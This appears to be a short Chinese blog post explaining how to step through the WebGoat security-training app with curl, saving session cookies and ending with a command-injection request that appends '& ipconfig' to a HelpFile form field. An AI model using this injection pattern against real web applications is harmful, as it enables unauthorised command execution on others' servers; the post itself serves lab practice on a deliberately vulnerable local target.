curl摸擬瀏覽器運行WebGoat

這個WebGoat有一些個性化的操作,所以記錄在此

步驟:

 

1、 curl -u "guest:guest" -D cookie.jar "http://localhost/WebGoat/attack"  -v

登錄進入WebGoat,並保存COOKIE

 

2、 curl -u "guest:guest" -b cookie.jar -d "start=Start+WebGoat" "http://localhost/WebGoat/attack" -v

提交start = Start WebGoat的表單,進入WebGoat的主頁面。

此時,應該查看頁面源代碼中你想點的鏈接是什麼

如:

 

<td><img src="images/buttons/lessonComplete.jpg"><a href="attack?Screen=497&menu=1200">Command Injection</a></td>

 

注意: WebGoat對不同的COOKIE,返回的頁面鏈接並不相同,如果在後面的步驟中,你訪問的是瀏覽器裏查看到的鏈接,很可能那個鏈接就不存在,返回的是主頁中的介紹信息,而不是你想訪問的鏈接的內容。

另外,由於WebGoat是使用NTLM認證協議,所以每次curl,都得帶-u "guest:guest"

 

3、curl -u "guest:guest" -b cookie.jar "http://localhost/WebGoat/attack?Screen=503&menu=1200" -v

這樣就可以訪問到你想訪問的鏈接了。

 

4、如果要實現命令注入,提交如下:

curl -u "guest:guest" -b cookie.jar -d "HelpFile=AccessControlMatrix.help%22%20%26%20ipconfig&SUBMIT=View" "http://localhost/WebGoat/attack?Screen=497&menu=1200" -v > a.html

 

 

發佈了53 篇原創文章 · 獲贊 2 · 訪問量 11萬+
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章